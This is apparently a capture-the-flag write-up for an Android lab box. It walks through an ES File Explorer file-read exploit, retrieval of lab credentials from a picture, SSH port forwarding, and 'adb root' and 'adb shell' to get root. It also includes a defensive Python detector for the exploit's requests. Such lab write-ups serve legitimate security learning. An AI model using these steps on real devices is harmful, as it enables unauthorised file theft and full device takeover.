@0xEmbo
Created August 13, 2021 17:50

10.10.10.247

Foothold

Nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-02 15:57 EET
Nmap scan report for 10.10.10.247 (10.10.10.247)
Host is up (0.14s latency).

PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp  filtered freeciv
35971/tcp closed   unknown
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.80%I=7%D=7/2%Time=60DF1B3D%P=x86_64-pc-linux-gnu%r(NUL
SF:L,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
Service Info: Device: phone

First of all, let's look for exploits for these services (ES File Explorer and Bukkit JSONAPI). I found an arbitrary file read exploit for ES File Explorer 4.1.9.7.4 and no other exploits, so let's just try it.

https://www.exploit-db.com/exploits/50070

Reading the exploit code, it sends a POST request with a Content-Type: application/json header and a JSON body of the form {"command": cmd} to http://10.10.10.247:59777/.

The available commands to use are:

| Command | Description |
| --- | --- |
| listFiles | List all files |
| listPics | List all pictures |
| listVideos | List all videos |
| listAudios | List all audios |
| listApps | List installed applications |
| listAppsSystem | List system apps |
| listAppsPhone | List communication related apps |
| listAppsSdcard | List applications on SDCard |
| listAppsAll | List all applications |
| getFile | Download a file |
| getDeviceInfo | Get device info |
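As an added example (not part of the original gist or the exploit-db script), here is a small detector that recognises this request shape in captured traffic and rates it using the command table above; the sample requests are constructed, not recorded from the box.

```python
import json

# Command table of the ES File Explorer HTTP service on port 59777 (from the
# table above). getFile and getDeviceInfo read data off the device ("high");
# the list* commands only enumerate storage and apps ("medium").
ES_COMMANDS = {
    "listFiles", "listPics", "listVideos", "listAudios", "listApps",
    "listAppsSystem", "listAppsPhone", "listAppsSdcard", "listAppsAll",
    "getFile", "getDeviceInfo",
}
HIGH_RISK = {"getFile", "getDeviceInfo"}

def parse_es_request(raw: bytes):
    """Return (command, severity) if raw is an ES File Explorer command request
    (POST, Content-Type application/json, body {"command": ...}), else None."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None  # no header/body separator: not a complete request
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[0] != "POST":
        return None
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if not headers.get("content-type", "").lower().startswith("application/json"):
        return None
    try:
        payload = json.loads(body.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return None
    cmd = payload.get("command") if isinstance(payload, dict) else None
    if not isinstance(cmd, str):
        return None
    severity = "high" if cmd in HIGH_RISK else "medium" if cmd in ES_COMMANDS else "low"
    return cmd, severity

# Constructed sample requests (not from the box): two commands and a GET that must not match.
SAMPLES = [
    b'POST / HTTP/1.1\r\nHost: 10.10.10.247:59777\r\n'
    b'Content-Type: application/json\r\n\r\n{"command": "getDeviceInfo"}',
    b'POST / HTTP/1.1\r\nHost: 10.10.10.247:59777\r\n'
    b'Content-Type: application/json\r\n\r\n{"command": "listPics"}',
    b'GET / HTTP/1.1\r\nHost: 10.10.10.247:59777\r\n\r\n',
]

def scan(samples):
    return [hit for hit in map(parse_es_request, samples) if hit is not None]
```

Any hit at all on a phone's network is worth an alert, since the service accepts these commands without authentication.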

Let's first try the exploit manually before running the Python script: visit http://10.10.10.247:59777/, intercept the request with Burp or ZAP, send it to Repeater and edit the request as the exploit does. We get a response with the device info. ![[Pasted image 20210702162329.png]]

Now that we understand how the exploit works, let's run the script, because it parses the JSON response and makes our life easier.

While enumerating, I found that the ES File Explorer version is 4.1.9.7.3, which is why the exploit works (an exploit for a specific version may also work on older versions). ![[Pasted image 20210702165426.png]]

While trying every command, I ran listPics and found an interesting picture (creds.jpg). ![[Pasted image 20210702175549.png]] I downloaded it using python3 exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg and opened it. It contains credentials.

kristi:Kr1sT!5h@Rp3xPl0r3! ![[Pasted image 20210702175752.png]]

Now let's SSH to the box with these creds and we are in. ![[Pasted image 20210702180057.png]]

Getting root

Doing some research on the ports we found earlier: port 5555 is used for Android Debug Bridge (ADB) connections, and HackTricks describes how to use this service to get a root shell.

https://book.hacktricks.xyz/mobile-apps-pentesting/android-app-pentesting/adb-commands

POC:

  • First, we have to forward the port over SSH because the service is listening on localhost only: ssh -p 2222 -L 1337:localhost:5555 kristi@10.10.10.247 ![[Pasted image 20210702201835.png]] That means 127.0.0.1:1337 ==> 10.10.10.247:5555
  • Connect to the ADB service (port 5555) using the adb tool: adb connect <IP>:<PORT> ![[Pasted image 20210702201811.png]]
  • Check that the phone is connected to your PC: adb devices ![[Pasted image 20210702203028.png]]
  • Now, using the adb tool, we can do anything on the device, so to get root type adb root ![[Pasted image 20210702201727.png]] to restart the adbd daemon with root permissions.
  • Connect to the ADB service again: adb connect <IP>:<PORT>
  • Finally: adb shell ![[Pasted image 20210702201754.png]]